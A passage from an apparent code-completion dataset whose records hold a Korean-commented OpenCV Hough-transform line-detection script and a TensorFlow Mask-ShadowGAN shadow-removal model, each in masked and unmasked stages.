"step-3": "<mask token>\nsrc = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)\nif src is None:\n print('Image load failed')\n sys.exit()\nedges = cv2.Canny(src, 50, 150)\nlines = cv2.HoughLinesP(edges, 1, np.pi / 180.0, 150, minLineLength=50,\n maxLineGap=5)\ndst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)\nif lines is not None:\n for i in range(lines.shape[0]):\n pt1 = lines[i][0][0], lines[i][0][1]\n pt2 = lines[i][0][2], lines[i][0][3]\n cv2.line(dst, pt1, pt2, (0, 255, 0), 2, cv2.LINE_AA)\ncv2.imshow('src', src)\ncv2.imshow('edges', edges)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()\n",
"step-4": "import sys, cv2, numpy as np\nsrc = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)\nif src is None:\n print('Image load failed')\n sys.exit()\nedges = cv2.Canny(src, 50, 150)\nlines = cv2.HoughLinesP(edges, 1, np.pi / 180.0, 150, minLineLength=50,\n maxLineGap=5)\ndst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)\nif lines is not None:\n for i in range(lines.shape[0]):\n pt1 = lines[i][0][0], lines[i][0][1]\n pt2 = lines[i][0][2], lines[i][0][3]\n cv2.line(dst, pt1, pt2, (0, 255, 0), 2, cv2.LINE_AA)\ncv2.imshow('src', src)\ncv2.imshow('edges', edges)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()\n",
"step-5": "## 허프변환에 의한 직선 검출\r\n# cv2.HoughLines(image, rho, theta, threshold, lines=None, srn=None, stn=None, min-theta=None, max-theta=None) => lines\r\n# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)\r\n# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)\r\n# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)\r\n\r\n# rho, theta 값이 커지면 축적배열의 크기는 작아지고, 값이 작으면 축적배열은 커진다.\r\n# 축적배열이 크면 정교한 직선을 표현할 수 있으나, 연산량이 많아진다.\r\n# 축적배열이 작아면 정밀한 직선을 표현할 수 없으나, 연산량이 적어 속도는 빠르다.\r\n\r\n# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.\r\n\r\n# lines : rho, theta 값을 담고 있는 3차원 행렬(numpy.ndarray) 형태로 리턴된다.\r\n# rho, theta를 행렬로 표현한다고 하면 rho, theta 2개만 있으면 되는데\r\n# c++에서 파이썬으로 넘어오면서 쓸데없는 값이 추가되었다.\r\n# lines 의 shape은 (N, 1, 2), dtype = numpy.float32 **shape 주의할 것\r\n# 가운데 1이 의미없는 값. 그래서 나중에 코드화할 때 [0]을 집어넣으면 된다.\r\n\r\n# rho, theta값은 우리가 알아보기 힘들다.\r\n## 확률적 허프 변환\r\n# cv2.HoughLinesP(image, rho, theta, threshold, lines=None, minLineLength=None, maxLineGap=None)\r\n# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)\r\n# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)\r\n# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)\r\n# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.\r\n\r\n# lines : 선분의 시작과 끝 좌표(x1, y1, x2, y2) 정보를 담고 있는 numpy.ndarray\r\n# shape=(N, 1, 4), dtype = numpy.int32\r\n\r\n# minLineLength : 검출하기 위한 선분의 최소 길이. (최소길이에 못미치면 검출X)\r\n# maxLineGap : 직선으로 간주하기 위한 최대 에지 점 간격. 기본값 0\r\n# 기본값이 0일 때는, _ _ 이렇게 에지에 간격이 있으면 하나의 직선으로 보지 않고,\r\n# 이 값을 4로 줬을 때는, __ _ __ ___ 이렇게 간격이 3개 있어도 하나의 직선으로 본다.\r\n\r\nimport sys, cv2, numpy as np\r\n\r\n# src = cv2.imread('./images/bd.png', cv2.IMREAD_GRAYSCALE)\r\nsrc = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)\r\nif src is None:\r\n print('Image load failed')\r\n sys.exit()\r\n\r\nedges = cv2.Canny(src, 50, 150)\r\n\r\nlines = cv2.HoughLinesP(edges, 1, np.pi/180.0, 150, minLineLength=50, maxLineGap=5) # threshold값 ↑적게검출 ↓많이검출 \r\n\r\n# 색을 칠해서 선분을 표현할 거니까 해당 edge를 BGR로 바꿔줘야함. Canny()하면 grayscale됨.\r\ndst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)\r\n\r\nif lines is not None:\r\n for i in range(lines.shape[0]): # N개 검출됨. N의 값은 알 수 없다.\r\n pt1 = (lines[i][0][0], lines[i][0][1]) # 시작점 좌표, 가운데 값은 무조건 0으로\r\n pt2 = (lines[i][0][2], lines[i][0][3]) # 끝점 좌표, 가운데 값은 무조건 0으로\r\n\r\n cv2.line(dst, pt1, pt2, (0,255,0), 2, cv2.LINE_AA)\r\n\r\n\r\ncv2.imshow('src',src)\r\ncv2.imshow('edges',edges)\r\ncv2.imshow('dst',dst)\r\ncv2.waitKey()\r\n\r\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import tensorflow as tf
from models.base_model import BaseModel
from utils.im_utils import batch_convert_2_int
from datasets.single_dataset import SingleDataset
from datasets.unpaired_dataset import UnpairedDataset
from models.generators.maskshadowgan_generators import Generator
from models.discriminators.maskshadowgan_discriminators import Discriminator
class MaskShadowGANModel(BaseModel):
"""
Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.
A: shadow images domain
B: shadow free images domain
Paper: https://arxiv.org/pdf/1903.10683.pdf
"""
def __init__(self, opt, training):
BaseModel.__init__(self, opt, training)
# create placeholders for images and shadow masks
self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])
self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])
self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])
def generate_dataset(self):
"""
Add ops for dataset loaders to graph
"""
if self.training:
dataset = UnpairedDataset(self.opt, self.training)
datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache', cacheB='./dataB.tfcache')
dataA_iter = datasetA.make_initializable_iterator()
dataB_iter = datasetB.make_initializable_iterator()
return dataA_iter, dataB_iter, dataA_iter.get_next(), dataB_iter.get_next()
else: # only need shadow dataset for testing
dataset = SingleDataset(self.opt, self.training)
datasetA = dataset.generate()
dataA_iter = datasetA.make_initializable_iterator()
return dataA_iter, dataA_iter.get_next()
def build(self):
"""
Build TensorFlow graph for MaskShadowGAN model.
"""
# add ops for generator (A->B) to graph
self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf, norm_type=self.opt.layer_norm_type,
init_type=self.opt.weight_init_type, init_gain=self.opt.weight_init_gain,
training=self.training, name='G')
if self.training:
# add ops for other generator (B->A) and discriminators to graph
self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,
norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,
init_gain=self.opt.weight_init_gain, training=self.training, name='F')
self.D_A = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,
norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,
init_gain=self.opt.weight_init_gain, training=self.training, name='D_A')
self.D_B = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,
norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,
init_gain=self.opt.weight_init_gain, training=self.training, name='D_B')
# generate fake images
fakeB = self.G(self.realA)
fakeA = self.F(self.realB, self.rand_mask)
# generate reconstructed images
reconstructedA = self.F(fakeB, self.last_mask)
reconstructedB = self.G(fakeA)
# generate identity mapping images
identA = self.G(self.realB)
identB = self.F(self.realA, self.mask_non_shadow)
tf.summary.image('A/original', batch_convert_2_int(self.realA))
tf.summary.image('B/original', batch_convert_2_int(self.realB))
tf.summary.image('A/generated', batch_convert_2_int(fakeA))
tf.summary.image('B/generated', batch_convert_2_int(fakeB))
tf.summary.image('A/reconstructed', batch_convert_2_int(reconstructedA))
tf.summary.image('B/reconstructed', batch_convert_2_int(reconstructedB))
# add loss ops to graph
Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB, reconstructedA,
reconstructedB, identA, identB)
# add optimizer ops to graph
optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)
return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss
else: # only need generator from A->B during testing
fakeB = self.G(self.realA)
return fakeB
def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA, identB):
"""
Compute the losses for the generators and discriminators.
"""
# compute the generators loss
G_loss = self.__G_loss(self.D_B, fakeB)
F_loss = self.__G_loss(self.D_A, fakeA)
cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)
ident_loss = self.__identity_loss(identA, identB)
Gen_loss = G_loss + F_loss + cc_loss + ident_loss
# Compute the disciminators loss. Use fake images from image pool to improve stability
D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)
D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)
return Gen_loss, D_A_loss, D_B_loss
def __D_loss(self, D, real, fake):
"""
Compute the discriminator loss.
(MSE Loss):
L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]
"""
loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) + \
tf.reduce_mean(tf.square(D(fake))))
return loss
def __G_loss(self, D, fake):
"""
Compute the generator loss.
(MSE Loss):
L_gen = Expectation of (D(G(A)) - 1)^2
"""
loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))
return loss
def __cycle_consistency_loss(self, reconstructedA, reconstructedB):
"""
Compute the cycle consistenty loss.
L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +
lamb * [Expectation of L1_norm(G(F(B)) - B)]
"""
loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.realA)) + \
self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB - self.realB))
return loss
def __identity_loss(self, identA, identB):
"""
Compute the identity loss.
L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +
lamB * [Expectation of L1_norm(G(B) - B)]]
"""
loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.abs(identB - self.realA)) + \
self.opt.lamB * tf.reduce_mean(tf.abs(identA - self.realB)))
return loss
def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):
"""
Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN
https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py
"""
def make_optimizer(loss, variables, name='Adam'):
""" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)
and a linearly decaying rate that goes to zero over the next 100k steps
"""
global_step = tf.Variable(0, trainable=False, name='global_step')
starter_learning_rate = self.opt.lr
end_learning_rate = 0.0
start_decay_step = self.opt.niter
decay_steps = self.opt.niter_decay
beta1 = self.opt.beta1
learning_rate = (tf.where(tf.greater_equal(global_step, start_decay_step),
tf.train.polynomial_decay(starter_learning_rate,
global_step-start_decay_step,
decay_steps, end_learning_rate,
power=1.0),
starter_learning_rate))
learning_step = (tf.train.AdamOptimizer(learning_rate, beta1=beta1, name=name)
.minimize(loss, global_step=global_step, var_list=variables))
return learning_step
Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.variables, name='Adam_Gen')
D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name='Adam_D_A')
D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name='Adam_D_B')
with tf.control_dependencies([Gen_optimizer, D_A_optimizer, D_B_optimizer]):
return tf.no_op(name='optimizers')
|
normal
|
{
"blob_id": "cbbe273a19a4e60b760e35aeb8d43972a46760f5",
"index": 3436,
"step-1": "<mask token>\n\n\nclass MaskShadowGANModel(BaseModel):\n <mask token>\n <mask token>\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MaskShadowGANModel(BaseModel):\n <mask token>\n <mask token>\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = tf.where(tf.greater_equal(global_step,\n start_decay_step), tf.train.polynomial_decay(\n starter_learning_rate, global_step - start_decay_step,\n decay_steps, end_learning_rate, power=1.0),\n starter_learning_rate)\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=\n beta1, name=name).minimize(loss, global_step=global_step,\n var_list=variables)\n return learning_step\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.\n variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name=\n 'Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name=\n 'Adam_D_B')\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer,\n D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-3": "<mask token>\n\n\nclass MaskShadowGANModel(BaseModel):\n \"\"\"\n Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.\n\n A: shadow images domain\n B: shadow free images domain\n\n Paper: https://arxiv.org/pdf/1903.10683.pdf\n \"\"\"\n\n def __init__(self, opt, training):\n BaseModel.__init__(self, opt, training)\n self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, 1])\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n 